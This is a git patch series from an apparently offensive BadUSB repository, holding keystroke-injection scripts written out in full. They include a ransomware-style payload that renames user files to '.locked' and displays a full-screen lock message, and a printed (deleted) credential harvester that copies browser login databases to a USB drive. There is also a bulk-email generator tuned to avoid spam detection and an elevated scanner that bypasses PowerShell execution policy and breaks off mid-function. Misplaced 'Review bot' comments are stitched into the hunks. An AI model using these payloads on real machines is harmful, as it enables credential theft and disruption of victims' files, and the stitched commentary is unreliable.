Date: Tue, 21 May 2024 16:27:41 -0400
Subject: [PATCH 30/33] Create RansomwareSimulation1.txt
---
 .../RansomwareSimulation1.txt | 91 +++++++++++++++++++
 1 file changed, 91 insertions(+)
 create mode 100644 BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
new file mode 100644
index 00000000..b35bd533
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation1.txt
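Review bot: `STRING invoke-command -scriptblock $script` at the end of the hunk references a `$script` variable that no line of the file assigns, so that call fails with a null ScriptBlock argument, and because every preceding statement has already been typed into and executed by the interactive session, the `REM Create the PowerShell script in memory and execute it` comment does not describe what actually happens — either drop that line or assign the body to `$script = { ... }` and invoke it once. In the final loop, `$initialDelay += (Get-Random -Minimum 5 -Maximum 10)` accumulates across iterations (the `$initialDelay = 2` inside `check-cve` is function-local and never seen here), so the sleep before each lookup grows with every package checked; `$initialDelay = (Get-Random -Minimum 5 -Maximum 10)` is presumably what was meant. `check-cve` queries `https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=...`, an endpoint NVD retired in 2023; the 2.0 endpoint (`https://services.nvd.nist.gov/rest/json/cves/2.0` with a `keywordSearch=` parameter) returns a differently shaped document, so `$response.result.cve_items` and `$cve.cve.cve_data_meta.id` would need to change as well, and the 403 retry branch duplicates that parsing instead of looping over one code path. The version lookup compares Get-Process names against uninstall-registry DisplayName values with `-eq`, which will rarely hit because a process name and a product display name are usually different strings, so most entries silently skip the CVE check; a comment stating that limitation, or a `-like "*$software*"` match, would make the results file honest about its coverage.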
@@ -0,0 +1,91 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 1000
+REM opens powershell (this is for windows machines)
+STRING powershell
+ENTER
+DELAY 3000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 500
+ENTER
+DELAY 500
+STRING )
+DELAY 500
+ENTER
+DELAY 500
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 500
+ENTER
+DELAY 500
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 500
+ENTER
+DELAY 500
+REM Get all files in the path and rename them
+STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
+DELAY 500
+ENTER
+DELAY 500
+STRING }
+DELAY 500
+ENTER
+DELAY 2000
+REM Display ransomware message
+STRING Add-Type -AssemblyName PresentationFramework
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window = New-Object System.Windows.Window
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowStartupLocation = 'CenterScreen'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowState = 'Maximized'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Topmost = $true
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.ShowDialog()
+DELAY 500
+ENTER
+DELAY 2000
+STRING exit
+DELAY 500
+ENTER
+REM check out my github at github.com/markcyber for more badusb & hacking type tools
From 1952a0075b94fa39cc75b3be3e891aa1a2986d74 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:28:14 -0400
Subject: [PATCH 31/33] Create RansomwareSimulation2(cleanup).txt
---
 .../RansomwareSimulation2(cleanup).txt | 62 +++++++++++++++++++
 1 file changed, 62 insertions(+)
 create mode 100644 BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt
diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt
new file mode 100644
index 00000000..3be26299
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt
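Review bot: `STRING [System.Environment+SpecialFolder]::Downloads` names a member that, as far as I know, System.Environment.SpecialFolder does not define (it has Desktop, MyPictures, MyMusic, MyDocuments, UserProfile and others, but no Downloads), so that array element is `$null` and `[Environment]::GetFolderPath($folder)` rejects it on the fourth iteration; depending on the session's error handling, `$path` may then still hold the previous folder and the rename runs over it a second time, producing `.locked.locked` names, and the same list appears in the cleanup hunk of PATCH 31 (`RansomwareSimulation2(cleanup).txt`). If the Downloads folder is intended, build the path explicitly in both scripts, e.g. `Join-Path ([Environment]::GetFolderPath('UserProfile')) 'Downloads'`, so the cleanup covers exactly the set that was renamed. The header refers to `(1.1)RansomwareSimulationCleanup`, but the companion file is `RansomwareSimulation2(cleanup).txt` (renamed to `RansomwareSimulation2-cleanup.txt` in PATCH 32), so the REM should name the real file. The cleanup relies solely on the `.locked` suffix and keeps no record of original names, so a comment such as `REM Cleanup strips one .locked suffix per run; files that already ended in .locked before the simulation will lose that suffix` would warn whoever runs this in a lab.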
@@ -0,0 +1,62 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 2000
+STRING powershell
+ENTER
+REM increased delays to make sure each command can go through even on slower computers
+DELAY 6000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 1000
+ENTER
+DELAY 1000
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 1000
+ENTER
+DELAY 2000
+STRING )
+DELAY 1000
+ENTER
+DELAY 3000
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 1000
+ENTER
+DELAY 1000
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 1000
+ENTER
+DELAY 4000
+REM Get all .locked files in the path and rename them back
+STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
+DELAY 2000
+ENTER
+DELAY 5000
+STRING }
+DELAY 1000
+ENTER
+DELAY 4000
+STRING exit
+DELAY 1000
+ENTER
+REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff
From ac6b7e350a0a36ac5247448412bf14b919d88cc0 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:28:38 -0400
Subject: [PATCH 32/33] Rename RansomwareSimulation2(cleanup).txt to RansomwareSimulation2-cleanup.txt
---
 ...Simulation2(cleanup).txt => RansomwareSimulation2-cleanup.txt} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename BadUSB/BadUSB-MarkCyber/RansomwareSimulation/{RansomwareSimulation2(cleanup).txt => RansomwareSimulation2-cleanup.txt} (100%)
diff --git a/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt b/BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt
similarity index 100%
rename from BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2(cleanup).txt
rename to BadUSB/BadUSB-MarkCyber/RansomwareSimulation/RansomwareSimulation2-cleanup.txt
From a051c3a3dc98da0ddd05138fbf1890249a0d33e8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:29:49 -0400
Subject: [PATCH 33/33] Delete BadUSB/MarkCyber-BadUSB directory
---
 .../MarkCyber-BadUSB/Emails/EmailSender.txt | 41 --
 .../Emails/GenerateEmailSend.py | 101 ---
 .../HackerStuff/CredentialHarvester.txt | 54 --
 .../HackerStuff/VulnerabilityScanner.txt | 630 ------------------
 .../RansomwareSimCleanup.txt | 62 --
 .../RansomwareSimMain.txt | 91 ---
 6 files changed, 979 deletions(-)
 delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
 delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
 delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
deleted file mode 100644
index f484d3ec..00000000
--- a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
+++ /dev/null
@@ -1,41 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
-REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
-REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
-REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
-REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-GUI r
-DELAY 500
-STRING chrome
-ENTER
-DELAY 1000
-STRING https://mail.google.com/mail/u/0/#inbox?compose=new
-ENTER
-DELAY 5000
-DELAY 1000
-STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
-DELAY 500
-TAB
-TAB
-STRING {YOUR SUBJECT NAME}
-TAB
-STRING Hi {THEIR NAME}
-ENTER
-ENTER
-STRING {CONTENTS OF THE EMAIL}
-ENTER
-ENTER
-STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
-ENTER
-ENTER
-STRING Respectfully,
-ENTER
-ENTER
-STRING {YOUR NAME}
-ENTER
-CTRL ENTER
-DELAY 5000
-DELAY 1000
-ALT F4
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
deleted file mode 100644
index 16662391..00000000
--- a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
+++ /dev/null
@@ -1,101 +0,0 @@
-#######################################################################################################################################
-#######################################################################################################################################
-################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
-################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
-################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
-################# This script will then make a badusb script using the name + email of each person ####################
-################# There are various subject options that will be chosen from, to minimize "spam" ####################
-################# Change the signature to your name, and put subject options that fit your email ####################
-################# Lastly, of course make sure to change the contents of the email to what you want ####################
-#######################################################################################################################################
-#######################################################################################################################################
-
-import pandas as pd
-import random
-
-# Load the Excel file, make sure it has the same name (or change the name in this script)
-file_path = 'NameAndEmails.xlsx'
-data_df = pd.read_excel(file_path)
-
-# Your excel should have 2 columns. Names, and Emails.
-data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
-data_cleaned_df.columns = ['Name', 'Email']
-
-# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
-subject_options = [
- "Placeholder for subject option 1",
- "Placeholder for subject option 2",
- "Placeholder for subject option 3",
- "Placeholder for subject option 4",
- "Placeholder for subject option 5",
- "Placeholder for subject option 6",
- "Placeholder for subject option 7"
-]
-
-# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
-# Just modify the actual email body and sender name to fit your needs
-email_body_template = """
-Hi {name},
-
-Placeholder for email body.
-
-Warm Regards,
-Sender Name
-"""
-
-# Function to generate BadUSB script
-def generate_badusb_script_with_placeholders_single_file(data_df):
- script_template = [
- "DELAY 1000",
- "GUI r",
- "DELAY 500",
- "STRING chrome",
- "ENTER",
- "DELAY 1000",
- "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
- "ENTER",
- "DELAY 5000"
- ]
-
- scripts = script_template
-
- for index, row in data_df.iterrows():
- name = row['Name']
- email = row['Email']
- subject = random.choice(subject_options)
- random_delay = random.randint(10000, 25000)
-
- email_body_lines = email_body_template.format(name=name).strip().split('\n')
- email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
-
- email_script = [
- "DELAY 1000",
- f"STRING {email}",
- "DELAY 500",
- "TAB",
- "TAB",
- f"STRING {subject}",
- "TAB"
- ] + email_body_lines + [
- "ENTER",
- "CONTROL ENTER",
- "DELAY 5000",
- f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
- "ALT F4"
- ]
-
- scripts += email_script
-
- return "\n".join(scripts)
-
-# Generate the BadUSB script with placeholders and proper send command in a single file
-final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
-
-# Save the script to a file
-final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
-with open(final_script_file_path, 'w') as file:
- file.write(final_script_with_placeholders)
-
-print(f"Script saved to {final_script_file_path}")
-
-#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts
diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
deleted file mode 100644
index d7a27cea..00000000
--- a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt
+++ /dev/null
@@ -1,54 +0,0 @@ -REM ################################################################################################################## -REM ############## This script was created by github.com/markcyber ############## -REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## -REM ############## The extracted data will require decryption ############## -REM ################################################################################################################## -REM Open PowerShell -DELAY 1000 -GUI r -DELAY 500 -STRING powershell -DELAY 500 -ENTER -DELAY 1000 -REM Check if the USB drive exists -STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; -STRING if ($usbDrive -ne $null) { -ENTER -DELAY 500 -STRING cd $usbDrive; -ENTER -DELAY 500 -STRING mkdir BrowserData; -ENTER -DELAY 500 -STRING cd BrowserData; -ENTER -DELAY 500 -REM Copy Chrome Login Data to USB -STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; -STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } -ENTER -DELAY 500 -REM Copy Firefox Login Data to USB -STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; -STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } -ENTER -DELAY 500 -REM Copy Edge Login Data to USB -STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; -STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } -ENTER -DELAY 500 -STRING } -ENTER -DELAY 500 -REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) -STRING echo off | clip -ENTER -DELAY 500 -REM Close PowerShell -STRING exit -ENTER -DELAY 500 -REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff 
diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt deleted file mode 100644 index 51e1b0d0..00000000 --- a/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt +++ /dev/null 
@@ -1,630 +0,0 @@
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-DELAY 1000
-REM Open Start Menu
-CONTROL ESCAPE
-DELAY 2000
-STRING powershell
-REM Navigate to the context menu to run PowerShell as an administrator
-DELAY 500
-RIGHTARROW
-DELAY 100
-DOWNARROW
-DELAY 100
-ENTER
-DELAY 3000
-ALT Y
-DELAY 5000
-REM Set PowerShell Execution Policy to Bypass
-DELAY 1000
-STRING set-executionpolicy bypass -scope process -force
-DELAY 200
-ENTER
-DELAY 200
-REM Create the PowerShell script in memory and execute it
-DELAY 200
-STRING $usbName = "MYUSB"
-DELAY 200
-ENTER
-DELAY 200
-STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($usbDrive) {
-DELAY 200
-ENTER
-DELAY 200
-STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
-DELAY 200
-ENTER
-DELAY 200
-STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
-DELAY 200
-ENTER
-DELAY 200
-STRING New-Item -ItemType Directory -Path $directoryPath
-DELAY 200
-ENTER
-DELAY 200
-STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
-DELAY 200
-ENTER
-DELAY 200
-STRING "" > $resultsFilePath
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-passwordpolicy {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING net accounts
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking password policy: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function audit-services {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-service | select-object name, displayname, status, starttype
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error auditing services: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-networksettings {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-netipconfiguration
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking network settings: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-softwarevulnerabilities {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking software vulnerabilities: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-cve {
-DELAY 200
-ENTER
-DELAY 200
-STRING param (
-DELAY 200
-ENTER
-DELAY 200
-STRING [string]$productname,
-DELAY 200
-ENTER
-DELAY 200
-STRING [string]$version
-DELAY 200
-ENTER
-DELAY 200
-STRING )
-DELAY 200
-ENTER
-DELAY 200
-STRING $initialDelay = 2
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
-DELAY 200
-ENTER
-DELAY 200
-STRING start-sleep -seconds $initialDelay
-DELAY 200
-ENTER
-DELAY 200
-STRING $response = invoke-restmethod -uri $uri -method get
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($response.totalresults -gt 0) {
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($cve in $response.result.cve_items) {
-DELAY 200
-ENTER
-DELAY 200
-STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING } else {
-DELAY 200
-ENTER
-DELAY 200
-STRING "no cves found for $productname $version"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking CVEs: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($_.Exception -match '403') {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
-DELAY 200
-ENTER
-DELAY 200
-STRING start-sleep -seconds 60
-DELAY 200
-ENTER
-DELAY 200
-STRING $retryResponse = invoke-restmethod -uri $uri -method get
-DELAY 200
-ENTER
-DELAY 200
-STRING if ($retryResponse.totalresults -gt 0) {
-DELAY 200
-ENTER
-DELAY 200
-STRING foreach ($cve in $retryResponse.result.cve_items) {
-DELAY 200
-ENTER
-DELAY 200
-STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING } else {
-DELAY 200
-ENTER
-DELAY 200
-STRING "no cves found for $productname $version"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function analyze-logs {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING get-eventlog -logname system -newest 100
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error analyzing logs: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-openports {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING netstat -an
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking open ports: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-missingupdates {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Checking Windows Update logs..."
-DELAY 200
-ENTER
-DELAY 200
-STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
-DELAY 200
-ENTER
-DELAY 200
-STRING Get-WindowsUpdateLog -LogPath $updateLogPath
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "WindowsUpdate.log written to $updateLogPath"
-DELAY 200
-ENTER
-DELAY 200
-STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error getting Windows Update log: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-firewallstatus {
-DELAY 200
-ENTER
-DELAY 200
-STRING try {
-DELAY 200
-ENTER
-DELAY 200
-STRING netsh advfirewall show allprofiles
-DELAY 200
-ENTER
-DELAY 200
-STRING } catch {
-DELAY 200
-ENTER
-DELAY 200
-STRING write-output "Error checking firewall status: $_"
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING }
-DELAY 200
-ENTER
-DELAY 200
-STRING function check-smbv1status {
